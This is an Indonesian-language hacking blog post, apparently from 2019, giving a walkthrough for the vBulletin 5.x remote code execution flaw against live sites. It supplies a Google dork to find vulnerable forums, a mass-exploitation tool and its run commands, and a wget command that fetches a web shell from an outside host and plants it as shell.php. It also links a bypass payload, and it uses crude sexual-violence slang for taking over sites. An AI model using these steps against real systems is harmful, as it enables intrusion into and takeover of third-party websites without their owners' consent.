Breaking

Rabu, 25 September 2019

vBulletin forum 5.0.0 - 5.5.4 remote code execution

Selamat malam semuanya, hari ini w share exploit rce lagi karena ora rce ora Oce๐Ÿ‘Š๐Ÿ˜Ž yaitu vBulletin forum 5.0.0 - 5.5.4 remote code execution. Exploit ini hanya bisa pada vBulletin versi 5.x.x saja klu dibawah nya misal versi 4.x.x mungkin bisa juga pake teknik mata batin ala roy kimochi๐Ÿ‘Š๐Ÿ˜ญ oc langsung aja.

Dork:
intext:"Powered By vBulletin Version 5.5.4"
Tools exploiter: https://github.com/Frint0/mass-pwn-vbulletin

Dorking dlo yakan cari yg versi nya 5.0.0 - 5.4.4
$git clone https://github.com/Frint0/mass-pwn-vbulletin
$cd mass-pwn-vbulletin
$python2 exploit.py http://localhost/
Jika sudah kita ketik id atau uname -a terserah Kelen mainin commandnya
Jika seperti itu berarti bisa kita perkaos :D
Kita bisa langsung panggil shell nya atau klu mau kelen maenin sendiri command command nya hihi
Disini w langsung upload shellnya, caranya?
wget http://linkshell.com/shell.txt -O shell.php
Lalu cek apakah sudah terupload atau belum. Cara cek nya ketik ls
Yeap file aink (os.php) berhasil terupload muehehe
Langsung akses aj ykan (http://localhost/[path]/shell.php)
Selesai tinggal di perkosa aj webna.

UPDATE!
Bagi yg punya kendala blank pas execute command, simak cara bypass nya berikut.


Link get content ~> https://megagamarra.com/ngeue.txt



Tidak ada komentar:

Posting Komentar